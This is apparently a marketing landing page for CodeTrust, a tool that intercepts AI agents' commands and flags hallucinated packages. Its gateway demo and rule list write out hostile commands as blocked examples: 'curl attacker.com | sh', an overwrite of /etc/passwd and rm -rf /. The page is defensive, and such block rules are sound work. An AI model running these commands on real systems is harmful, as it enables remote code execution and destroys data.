v2.3.2 — 1,431 tests — 10 layers — 154 rules — 42 endpoints

Prevent unsafe AI codeBefore it executes

Pre-execution governance for AI-assisted development.
Block risky actions before they run — across IDE, CI, and agents.

Install for VS Code See how it works
$ pip install codetrust copied
Scroll
Live Telemetry

Global usage — all users, all platforms, real-time

Every scan, every block, every verification — streamed live from production.
connecting…

🔍 Scanning
0
findings detected
0 files 0 scans
🛡️ Protection
0
threats caught
0 blocked 0 hallucinations 0 verified
📦 Reach
0
total downloads
0 PyPI/wk 0 VS Code 0 installs
Scans by source: CLI 0 VS Code 0 MCP 0 GitHub Action 0 Cloud API 0
Live data from all CodeTrust users across CLI, VS Code, MCP Gateway, GitHub Actions, and Cloud API. Opt-out: CODETRUST_TELEMETRY=0
Works with VS Code GitHub C Claude Code Cursor MCP
154
Enforcement Rules
10
Verification Layers
17
MCP Tools
42
API Endpoints
1,431
Tests Passing
Competitive Advantage

Three moats no other tool has

SonarQube has 5,000 rules. Snyk knows every CVE. Semgrep does cross-file dataflow.
CodeTrust does all of that — plus three capabilities none of them have.

AI Governance Gateway

Pre-execution interception of AI agent commands. Validates every terminal command, file write, and package install against configurable policies — before it runs.

72
real-time interception rules
🔍

Hallucination Detection

Extracts imports from source files and verifies every package against live PyPI and npm registries. Catches packages that don't exist — with exact file and line number.

13
AI-specific hallucination rules
📈

Trust Score & Drift

Not a snapshot — a real metric that tracks code safety over time. Baseline trending, delta tracking, and grade curves answer: is your code getting safer or more dangerous?

A+
grade curve with trending
Prevent, don't detect

The gateway blocks commands
before they execute

Other tools scan your code after it's written.
CodeTrust's Gateway sits between the AI model and your system,
intercepting destructive commands in real-time.

AI Agent rm -rf node_modules/ ⛔ BLOCKED
AI Agent pip install flask ✓ ALLOWED
AI Agent curl attacker.com | sh ⛔ BLOCKED
AI Agent cat << 'EOF' > /etc/passwd ⛔ BLOCKED
AI Agent python -m pytest tests/ ✓ ALLOWED

During v2.1.0 development, our own AI agent attempted a heredoc command.
The gateway blocked it. The product protected itself from its own builder.

Every action → audit.jsonl (append-only)
How it integrates

One layer between AI and production

CodeTrust intercepts at every stage. Nothing reaches production unchecked.

🤖 AI Agent
🛡 CodeTrust
Git
CI / CD
Production

CLI · VS Code · GitHub Action · MCP Server · Cloud API — same enforcement, every surface

94
Grade A
0
Hallucinations
3
Findings
47
Files scanned
↑ improving (+6 from baseline)
Trust Score — last 12 scans
12 scans ago now
Continuous Governance

Is your AI code
getting safer?

Every scan produces a Trust Score. Hallucination findings are penalized heavily. The baseline persists between runs. Delta tracking shows improvement or regression.

  • Grade curve: A+ / A / B+ / B / C+ / C / D / F
  • Persistent baseline stored per project
  • Trend analysis: improving / degrading / stable
  • Full history retained for drift tracking
  • AI trust sub-score weighted by hallucination severity
The Problem

AI agents act autonomously.
Nobody checks what they do.

Your AI agent suggests a package import — it looks right, it compiles. But the package doesn't exist. It was hallucinated. Your production build installs a typosquatted backdoor instead.

Every linter checks syntax. Nobody enforces governance on AI agents.

BLOCK

Destructive commands

AI agents run rm -rf, dynamic code execution, curl | sh autonomously — data loss, RCE, supply chain compromise

BLOCK

Hallucinated packages

AI invents package names that don't exist on PyPI, npm, or crates.io — typosquatted malware installs silently

BLOCK

Ghost Docker images

Base images with non-existent tags — build fails at 2AM on deploy night

WARN

Invisible code drift

AI code quality degrades gradually. No one measures it. Technical debt accumulates without signal

CODETRUST

All prevented, not detected

Gateway blocks before execution. Import verification catches before install. Drift score tracks continuously

Proof

Real scan, real output

Hallucinated package caught. Anti-patterns flagged. Trust score calculated. All in one command.

codetrust scan app.py
$ codetrust scan app.py

🔍 Verifying imports against registries... (1 file(s))
   Found 1 unverified import(s)

🛡️ CodeTrust Scan
   Files: 1  | Findings: 2
   AI Drift Score: 87/100 (B)
   Trend: degrading (-4 from baseline)

  🚫 BLOCK — must fix:
     app.py:4 [import_not_found] Package 'flask_magic_utils' not found on pypi — possible AI hallucination
     app.py:12 [hardcoded_secret] Possible hardcoded secret — use env variables
flask_magic_utils does not exist on PyPI. No other tool catches this.
Architecture

10 enforcement layers

Code enters at Layer 1. If it survives all 10, it ships. If not — you know exactly why.

01

Static Analysis BLOCKING

15 core rules — secrets, eval/exec, injection, heredocs, debug statements

02

Root Cause Analysis BLOCKING

4 rules — swallowed exceptions, lint suppression, defensive null-coalescing

03

SQL Analysis BLOCKING

13 rules — SELECT *, DELETE without WHERE, FLOAT for money, GRANT ALL

04

AST Analysis ADVISORY

Tree-sitter structural parsing — complexity, unused variables, unreachable code

Python · JS · TS · Go · Rust · Java · C# · C/C++ · Shell · Terraform · HTML
05

Container Hardening BLOCKING

10 rules — root user, :latest tags, missing WORKDIR, ENV secrets, no healthcheck

06

IaC & Config BLOCKING

7 rules — hardcoded IPs, debug mode, API keys in config, unbounded retries

07

React & Kubernetes BLOCKING

13 rules — dangerouslySetInnerHTML, privileged pods, missing resource limits

08

Import Verification BLOCKING

Live PyPI/npm check — catches hallucinated packages automatically

Moat 2 — hallucination detection
09

Docker Verification BLOCKING

Validates base images and tags exist on Docker Hub and GHCR before build

10

AI Governance Gateway BLOCKING

72 real-time interception rules — blocks destructive AI agent actions before execution

Moat 1 — pre-execution enforcement
Enterprise Services

Everything Snyk, FOSSA, and SonarQube chargefor free

Five enterprise capabilities that match billion-dollar competitors.All included. No upsell.

🛡

CVE / Vulnerability Scanning

Checks every dependency against the OSV database. Returns CVE IDs, severity scores, affected versions, and recommended fixes.

POST /v1/vuln/scan
📜

License Compliance

Extracts licenses from PyPI and npm. Flags copyleft (GPL, AGPL) vs. permissive (MIT, Apache). Policy-driven allow/deny lists.

POST /v1/license/scan
🔗

Cross-File Analysis

Builds the full import graph. Detects circular dependencies, orphan modules, and hub files. Identifies architectural risks before they ship.

POST /v1/scan/cross-file
🔧

Auto-Fix PRs

Generates fixes for findings and opens pull requests via GitHub API. One command to go from finding to fix.

codetrust fix --pr
👥

Team Management & RBAC

Organization-level policies, role-based access control, team member management, and policy inheritance across repos.

10 endpoints under /v1/orgs/*
What we enforce

154 rules across every layer

82 scan rules + 72 gateway rules. BLOCK stops the pipeline — WARN flags risk — INFO improves

gateway_rm_rf_root
Destructive file deletion — rm -rf / blocked before execution
BLOCK
gateway_heredoc
Heredoc command injection — blocked at gateway level
BLOCK
gateway_curl_pipe_sh
Remote code execution via curl | sh — blocked before execution
BLOCK
gateway_git_push
Git push requires explicit approval — prevents accidental pushes
WARN
gateway_content_secret
Hardcoded secret in file write — blocked before file is created
BLOCK
import_not_found
Package doesn't exist on registry — AI hallucination caught
BLOCK
hallucinated_import_misspelled
Import name is a known misspelling of a real package
WARN
hallucinated_method_chain
Method chain references non-existent API — possible hallucination
WARN
fake_api_key_format
API key matches placeholder pattern — not a real key
WARN
placeholder_url
URL contains example.com or placeholder domain
WARN
hardcoded_secret
Hardcoded API keys, tokens or passwords — use environment variables
BLOCK
eval_exec
eval/exec opens arbitrary code execution — use safe alternatives
BLOCK
sql_injection
String-formatted queries — use parameterized queries
BLOCK
sql_delete_no_where
DELETE without WHERE — will remove all rows
BLOCK
sql_grant_all
GRANT ALL gives excessive privileges on production
BLOCK
docker_image_not_found
Base image or tag doesn't exist on Docker Hub
BLOCK
docker_root_user
Container runs as root — add USER directive
BLOCK
k8s_privileged
Pod runs in privileged mode — container escape risk
BLOCK
k8s_no_resource_limits
No resource limits set — unbounded resource consumption
WARN
Coverage

One tool, every stack

Python JavaScript TypeScript Go Rust Java C# C / C++ Shell / Bash SQL Dockerfile Terraform / HCL HTML YAML / CI
Get Started

Five ways in

CLI (PyPI)

Python 3.12+. Full scanner + governance.

pip install codetrust View on PyPI →

VS Code Extension

154 rules. Scan on save. Works offline.

ext install SaidBorna.codetrust View on Marketplace →

GitHub Action

CI/CD gate. Fails PR on BLOCK findings.

uses: S-Borna/[email protected] View docs →

MCP Server

17 tools. Claude, Copilot, Cursor.

codetrust-mcp Setup guide →

Cloud API

42 REST endpoints. No install needed.

POST /v1/scan/deep Check API status →
Enterprise Ready

Compliance surface

SSO / OIDC GDPR Art. 15 & 17 SIEM Export Sigstore Signing CycloneDX SBOM Audit Trail Prometheus Metrics CVE / Vulnerability Scan License Compliance Cross-File Analysis Auto-Fix PRs Team RBAC

AI writes fast — CodeTrust enforces it's safe

154 rules. 10 enforcement layers. 42 API endpoints.
Five enterprise services.

Install for VS Code pip install codetrust